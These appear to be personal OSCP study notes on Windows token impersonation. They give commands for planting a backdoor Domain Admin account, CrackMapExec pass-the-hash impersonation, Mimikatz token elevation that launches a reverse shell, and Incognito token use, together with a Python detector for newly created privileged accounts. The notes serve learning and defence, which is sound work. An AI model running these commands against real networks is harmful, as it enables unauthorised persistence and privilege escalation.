<aside> 📌 Summary
</aside>
A token is a digital authentication credential that verifies a user's identity and grants access to resources or services. It contains user information, group memberships, and permissions.
Token impersonation is a security breach where an attacker exploits vulnerabilities to assume another user's token, acquiring their privileges. This enables unauthorized access to systems and data. Attackers can use techniques like token manipulation to escalate privileges, making it appear as if they are a legitimate user.
If we have successfully connected as a domain administrator, we might want to keep a backdoor by creating another domain administrator account:

```
net user /add hawkeye Passwor1@ /domain
net group "Domain Admins" hawkeye /ADD /DOMAIN
```
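From a defender's side, this backdoor pattern is visible in the Security log: an account creation (Event ID 4720) followed shortly by that account being added to Domain Admins (4728 for a global group, 4732 for a domain-local one). The Python below is an added example, not part of these notes; the event records are constructed sample data and `find_backdoor_admins` / `PRIVILEGED_GROUPS` are my own names.

```python
"""Correlate account creation (4720) with a quick addition to a
privileged group (4728/4732) to flag freshly created backdoor admins."""
from datetime import datetime, timedelta

# Constructed sample events; field names follow the Security log's own
# names (EventID, TimeCreated, TargetUserName, MemberName, SubjectUserName).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-05-01T10:00:00",
     "TargetUserName": "hawkeye", "SubjectUserName": "administrator"},
    {"EventID": 4728, "TimeCreated": "2024-05-01T10:00:12",
     "TargetUserName": "Domain Admins", "SubjectUserName": "administrator",
     "MemberName": "CN=hawkeye,CN=Users,DC=corp,DC=local"},
    {"EventID": 4720, "TimeCreated": "2024-05-01T11:30:00",
     "TargetUserName": "svc_backup", "SubjectUserName": "helpdesk"},
    {"EventID": 4728, "TimeCreated": "2024-05-03T09:00:00",
     "TargetUserName": "Domain Admins", "SubjectUserName": "helpdesk",
     "MemberName": "CN=svc_backup,CN=Users,DC=corp,DC=local"},
]

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators"}
GROUP_ADD_EVENTS = {4728, 4732}  # global / domain-local group member added


def _cn(member_name):
    # MemberName in 4728/4732 is a distinguished name; keep only the CN value.
    first = member_name.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def find_backdoor_admins(events, window_seconds=3600):
    """Return accounts added to a privileged group within window_seconds
    of their creation, oldest first."""
    created = {}  # account name (lowercase) -> creation timestamp
    hits = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = ts
        elif (ev["EventID"] in GROUP_ADD_EVENTS
              and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS):
            member = _cn(ev["MemberName"]).lower()
            born = created.get(member)
            if born is not None and ts - born <= timedelta(seconds=window_seconds):
                hits.append({"account": member, "group": ev["TargetUserName"],
                             "created_by": ev["SubjectUserName"],
                             "seconds_after_creation": int((ts - born).total_seconds())})
    return hits
```

With the default one-hour window only `hawkeye` is flagged; `svc_backup` was promoted almost two days after creation and is reported only if the window is widened.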
We can impersonate tokens remotely with the CrackMapExec impersonate module; first list the tokens available on the host, then execute a command under the chosen one:

```
cme smb 10.0.0.131 -u administrator -H <hash> --local-auth -M impersonate -o MODULE=list

cme smb 10.0.0.131 -u administrator -H <hash> --local-auth -M impersonate -o MODULE=exec TOKEN=2 EXEC=whoami
```
Using Mimikatz we'll take a look at the token module.
First, we need to enable the debug privilege with privilege::debug.
Then we can start listing available tokens:

```
token::list
```

Among them we found some domain administrators.

Then we can elevate privileges with the following:

```
token::elevate /domainadmin
token::run /process:"C:\someReverseShell.exe"
```
Incognito is a tool that can be loaded into a Meterpreter session. However, since I'm training for the OSCP, let's use the standalone version compiled by FSecureLABS here: https://github.com/FSecureLABS/incognito/.
From there, we can upload the binary to the target and run these commands:

```
.\incognito.exe list_tokens -u
.\incognito.exe execute -c "domain\user" C:\Windows\system32\cmd.exe
```